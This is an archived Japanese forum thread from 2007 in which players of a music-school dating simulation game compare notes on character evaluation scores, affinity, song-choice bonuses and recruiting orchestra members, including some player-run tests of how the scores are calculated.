月森→土浦→志水→火原→柚木→加地→冬海の優先順位かと思ったら
月森と志水の条件がかち合ったとき志水ボーナスで
何回かリロードしてみたけどやっぱり志水で固定っぽかった
別にどっちでも効果に違いはないだろうからいいんだけど
月森が好きなもんでちょっと微妙な気持ちにさせられる…

147 :名無しって呼んでいいか?:2007/10/11(木) 02:18:31 ID:???
>>146
評価はどっちが高かった?

148 :名無しって呼んでいいか?:2007/10/11(木) 02:21:10 ID:???
>>147
あー、それは覚えてないな…
でもたぶん志水じゃないかと思う
志水は技術レベルさえ上げてれば簡単に評価上がるけど
月森は評価上げるの一苦労だからね

149 :名無しって呼んでいいか?:2007/10/11(木) 02:24:03 ID:???
>>148
そっか、d
もし志水の方が高かったなら評価の高い方になるのかもしれないな
評価も同じなら月森がボーナスになったかもしれない

150 :名無しって呼んでいいか?:2007/10/11(木) 02:24:17 ID:???
>>146
2と同じだと、確かランダムのような…
でも、2の場合は呼び出したキャラになった覚えがある
餡子だとコンサート終了後だからどうだろう

151 :名無しって呼んでいいか?:2007/10/11(木) 02:25:24 ID:???
そういや金澤や王崎や吉羅にも評価あるんだね
誰にチョコ渡すかの選択のときに出てくる
攻略の役には立たないが
それぞれの上がる条件が知りたいもんだ

152 :名無しって呼んでいいか?:2007/10/11(木) 02:28:18 ID:???
親密度も評価も同じにするのって難しそう
2ならカンストさせればいいけど
アンコだと期間が短いからそれは無理だろうし

153 :名無しって呼んでいいか?:2007/10/11(木) 02:31:30 ID:???
曲調で評価が上がるタイプだったら、できなくもないかも
たとえば1回目のコンサートで火原・加地と組んで、
2回目のコンサートで同レベルで彩華・清麗の曲を選ぶとか
これだと評価は同じにできそう
親密度が難しそうだな

154 :名無しって呼んでいいか?:2007/10/11(木) 02:58:05 ID:???
>>151
どういう基準なんだろうなー
コンサート評価と親密度が上がる楽曲のとき一緒に評価も上がるとか?うーん

155 :名無しって呼んでいいか?:2007/10/11(木) 08:42:03 ID:???
曲調で評価が上がるタイプなら…仮に土浦と加地として、
1コンでは全く組まず、しかし親密度で仲間に引き入れて、
2コンで彩華オンリーにしとけば、コンサート評価でしか評価が上がってないことになるから、
あとは親密度だけだね
1桁差くらいにすることは比較的簡単だから、あとは日々の挨拶とかで、
1週間くらいの調整が出来れば

曲目は…動物の謝肉祭、パガニーニ、ラプソディインブルー、ルスラン、あたりで
ピアノ協奏曲や展覧会の絵もありか

156 :名無しって呼んでいいか?:2007/10/11(木) 09:07:53 ID:???
>>154
普段は評価あがってないと思うので、
単純にコンサート評価じゃないかなー?

157 :名無しって呼んでいいか?:2007/10/11(木) 09:46:22 ID:???
>>156
いや、コンサート評価だけだったら、毎回SSSな私の場合、評価は毎回同じになる筈だけど、
よく先輩辺りの評価が変わるから、もっと他にも要素があるとオモ。

158 :名無しって呼んでいいか?:2007/10/11(木) 09:50:25 ID:???
>>157
ほう、なるほど
評価って、あるなーということくらいしか確認してなかった
毎回周回ごとのあと1日データをとってあるから、
それみて楽曲の組み合わせなどもみながら、
コンサート後の評価をチェックしてみようかなあ、家帰ったら。

159 :157:2007/10/11(木) 12:57:50 ID:???
>>158
あと、演奏範囲にたまたまいたから演奏聴かせたって時もあったんだ。
そういうことあったなーって時には評価高かった気がする。
組み合わせまでは考えてなかったなー。

160 :名無しって呼んでいいか?:2007/10/11(木) 13:48:35 ID:???
ようやく「写真集」全部を埋めた。
「難しい」だとアンサンブル完成&動員数集めでいっぱいいっぱいだから
王崎先輩の親密度を500以上にするのが大変だったよ。

(単に自分が要領悪いのもあるだろうが)
正直、餡子は(個人差はあると思うが)期間が短いから課題達成が気になって
アンサンブル演奏を楽しめる時間が少ない気がしたなぁ。
ひと段落したから、残りの用語辞典発見をしてみるよ。


161 :名無しって呼んでいいか?:2007/10/11(木) 13:54:57 ID:???
餡子は休日が少ないのが辛かったな
その割に、休日潰すイベントが結構あるんで
難易度は2と比べても全然緩かった。2のBP不足はきつい

162 :名無しって呼んでいいか?:2007/10/11(木) 14:46:27 ID:???
何となく選曲ボーナスについて、検証に基づいたものを書いてみた
が、何か見映えが悪いので、wikiの編集に詳しい方、応援頼む…
自分にはこれが精一杯

163 :名無しって呼んでいいか?:2007/10/11(木) 19:19:05 ID:???
トランペット一人足りなくて不合格ー!!!○| ̄|_

164 :名無しって呼んでいいか?:2007/10/11(木) 20:46:14 ID:???
>>163
珍しい人だな
モブに、情報画面みてますか?とつっこまれておいで

165 :名無しって呼んでいいか?:2007/10/11(木) 21:08:38 ID:???
初回プレイの時、情報画面大事と言われてたのに情報チェックしてなくて
ただひたすら音楽科生徒に演奏聴かせさえすればいいと思ってた
こんなに聴かせてるのになんで人数集まらないんだよー!と混乱してたなぁ


166 :名無しって呼んでいいか?:2007/10/11(木) 21:28:39 ID:???
>>165
2の時は動員人数だけ考えればよかったから、
適当にアンサンブル聞かせていたなぁ。
おかげで餡子では音楽科モブの情報を詳しく見るクセがついたし、何人かは覚えた。
久しぶりに2をプレイする予定だが、今度はさくさく集められそうだ。

167 :名無しって呼んでいいか?:2007/10/11(木) 22:35:08 ID:???
大人組の評価について、調べた
毎回周回ごとの最終日データを1回目とか名前をつけて保存して、
さらに最終週をやり直したりして変化したものは1回目Bとして保存
1〜5周目までの9つのデータ、及び6周目のデータで確認
周ごとの難易度やプレイ方針は様々で、
人物ボーナスや曲調ボーナス、ロシアやフランスづくしなどもあるし、
金やんに愁情聴かせまくって親密度高くしたり王崎とたくさん練習したり、
理事長のイベント進めたり進めなかったりしたけど、
それらによる変化はみられなかった
1〜5周目までは1コン評価がすべてSだけど、その場合に2コンがSSだと、
金澤・王崎・吉羅の評価は順に210・350・140、
SSSだと225・375・150となる
6周目のみ1コンSSで、2コンSSSで255・425・170になってた

168 :167:2007/10/11(木) 22:36:31 ID:???
長々と書いたが結論として、
大人組の評価はコンサート評価で決まるものと思われます

169 :名無しって呼んでいいか?:2007/10/11(木) 22:55:48 ID:???
>>164
情報は見てたんだけどね

曲完成さすのに必死だったんだ
そして、日付が無くなったんだ

やり直して、加地引き継ぎ何とかなりました


初めての「難しい」だったからな…
難しいで志水の評価400貰えるかが心配です

170 :名無しって呼んでいいか?:2007/10/11(木) 23:07:15 ID:???
>>169
それをみていないというのでは
オケ課題画面ちゃんとみて足りないパートのメンバーの条件みるのは基本
そもそも勧誘手段は練習を聴かすことなんだから、
練習が忙しいとかいう問題じゃないし

ちなみに難しいで志水評価上げは余裕だぞ
月森も実は案外楽
つーか自分が写真集で難しいでの評価基準満たしたのまだこの2人だけだわ

171 :名無しって呼んでいいか?:2007/10/11(木) 23:13:10 ID:???
170
厳しい突っ込み有難う。
色々自分の余裕が無かったみたいですね
残りのオケは難しいばっかりなので、精進します

172 :名無しって呼んでいいか?:2007/10/11(木) 23:16:57 ID:???
>>169
志水は技術Lvを上げるだけだから割と簡単だと思う。
初期から休日の2人練習とかでアームレットつけて練習、
コンミス試験のアンサンブル曲を技術レベル高い曲にして
メンバーに志水をいれておけば大丈夫だよ。頑張れ!

173 :名無しって呼んでいいか?:2007/10/11(木) 23:17:27 ID:???
>>171
まあとりあえず、まめにチェックして加入させた方がよいってことで
親密度1とかさ、簡単なのをみつけて、
習熟度が低いときの一人練習とかで巻き込んでおくとよい
人によるけど、自分は集客も兼ねて序盤はオケメンバー集めてる
音楽科の方が1人あたりの集客数多いし、
どうせならねらっていった方が効率がいいから

174 :名無しって呼んでいいか?:2007/10/11(木) 23:19:41 ID:???
>>170
自分は「難しい」での火原評価400以上が苦労した。
冬海対立を利用することが多いので、どうしても清麗曲で揃えてしまうからw
でも「ルスラン」を聞かせまくったら最終的に740まで行ったけどね。


175 :名無しって呼んでいいか?:2007/10/11(木) 23:21:36 ID:???
>>173
餡子は最初から音楽科モブも集客できるからな。
2の時は1コン時は殆ど無視して普通科モブに聞かせまくっていたw

176 :名無しって呼んでいいか?:2007/10/11(木) 23:23:16 ID:???
多分、LV19の曲を各曲調で揃えれば、
曲調注目のメンバーはいけると思う
けど、結構きついよな
親密度条件もあるから各個撃破が無難かも

177 :名無しって呼んでいいか?:2007/10/11(木) 23:26:02 ID:???
皆さんありがとう御座います
一番苦手なレベル上げ凹。
頑張ります!

178 :名無しって呼んでいいか?:2007/10/12(金) 01:15:05 ID:???
>>168
検証乙でした
コンサート評価か…しかしなぜ最後の最後で見せるかねw

179 :名無しって呼んでいいか?:2007/10/12(金) 03:28:37 ID:???
>>167
検証乙です
理事長は流石に評価の仕方厳しいなw
同じ演奏聴いても王崎先輩の半分以下か

180 :名無しって呼んでいいか?:2007/10/12(金) 06:31:13 ID:???
それでこそ理事w

181 :名無しって呼んでいいか?:2007/10/12(金) 09:43:24 ID:???
あ、選曲ボーナスについて書き直してくれた人ありがとう
随分すっきりしたんだねえ

182 :名無しって呼んでいいか?:2007/10/12(金) 11:01:16 ID:???
そういえば、1コンでSSSとれるのかな、1曲だから難しいかな
とれたら、大人組の評価は最高いくつまでいくんだろう

183 :名無しって呼んでいいか?:2007/10/12(金) 11:04:15 ID:???
2コンにおけるSSとSSSの評価差は、金やんが15、王崎25、理事が10か
1コンでSとSSの差は30、50、20だね
1コン後の評価が出ないから具体的な数字はみえないが…

184 :名無しって呼んでいいか?:2007/10/12(金) 11:24:43 ID:???
理事を基準に、1.5倍評価するのが金やん、2.5倍評価するのが王崎というところか
メインキャラの評価の上がり方と比較すれば目安の数値がわかるかもね
(たとえば全くハブにした状態のメインキャラの最終評価とか)

わかったからどうということもないけどw
何で表示されるんだろうねー

185 :名無しって呼んでいいか?:2007/10/12(金) 11:39:50 ID:???
仮に1コンと2コンで両方SSをとったとしたら理事評価が160になると試算して、
曲数で単純計算して1:3の比にすると、1コンで40、2コンで120の配分になり、
それを元に各ランクの評価を差分から計算…すると、
1コンでAランクだと評価0で、2コンでAだと100の計算になるからちょっと不自然

ていうところでやめとくか
コンプリ本には載ってないのかな、マエストロなら載るかな

186 :名無しって呼んでいいか?:2007/10/12(金) 11:48:41 ID:???
>>185
コンプリ本には評価方法は載っていない。
マエストロが出るなら載るだろうね。

187 :名無しって呼んでいいか?:2007/10/12(金) 11:50:37 ID:???
>>186
念のため確認、それはメインキャラの評価についても載ってないのかな

188 :186:2007/10/12(金) 12:11:07 ID:???
>>187
うん、メインキャラの評価も載っていないよ。
評価に関しては『○○以上の時に○○を聞かせる』という、評価上げ基準だけ。
マジでコンプリ本の中身は薄いんだw

189 :名無しって呼んでいいか?:2007/10/12(金) 12:28:48 ID:???
2と比べてアンコはやけにモブに気合い入れてる気がするのだが…なぜだw

190 :名無しって呼んでいいか?:2007/10/12(金) 12:41:14 ID:???
>>188
情報ありがとう、そーなのかー
マエストロ出るかな、マエストロ待ちかな

191 :名無しって呼んでいいか?:2007/10/12(金) 13:06:00 ID:???
>>185
その計算で1コンで60、2コンで100くらいの方が辻褄はあうかもなあ
そこから金やん、王崎先輩で1.5倍、2.5倍換算しても計算あうし

192 :名無しって呼んでいいか?:2007/10/12(金) 14:20:18 ID:???
>>189
情報を聞き出す、という役目を与えたからだろうか
一応情報を得るように説明書に書いてあるけど、
2をやった後では実際にはモブに話しかける人はそんなに多くないかもしれないし、
そこにネタを仕込んでおけば、話しかけると何かおもしろいと気づいて積極的に話しかけるようになるかもと

193 :名無しって呼んでいいか?:2007/10/12(金) 14:26:37 ID:???
2はモブ会話が寂しかったよな…
アンコは無印ほど種類は豊富ではないが、毎日変わるくらいが楽だよな

194 :名無しって呼んでいいか?:2007/10/12(金) 14:50:30 ID:???
そういえば情報画面みてますか系とか、苦手な曲調がどうとか、
技術レベルが何とかというモブって性格としては何系なんだろう?
特に性格タイプ指定はないのかな?
曲調の件も、結びが弾けるようになってみせます!みたいなのと頑張りまーす、みたいなのがいるよね

46 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)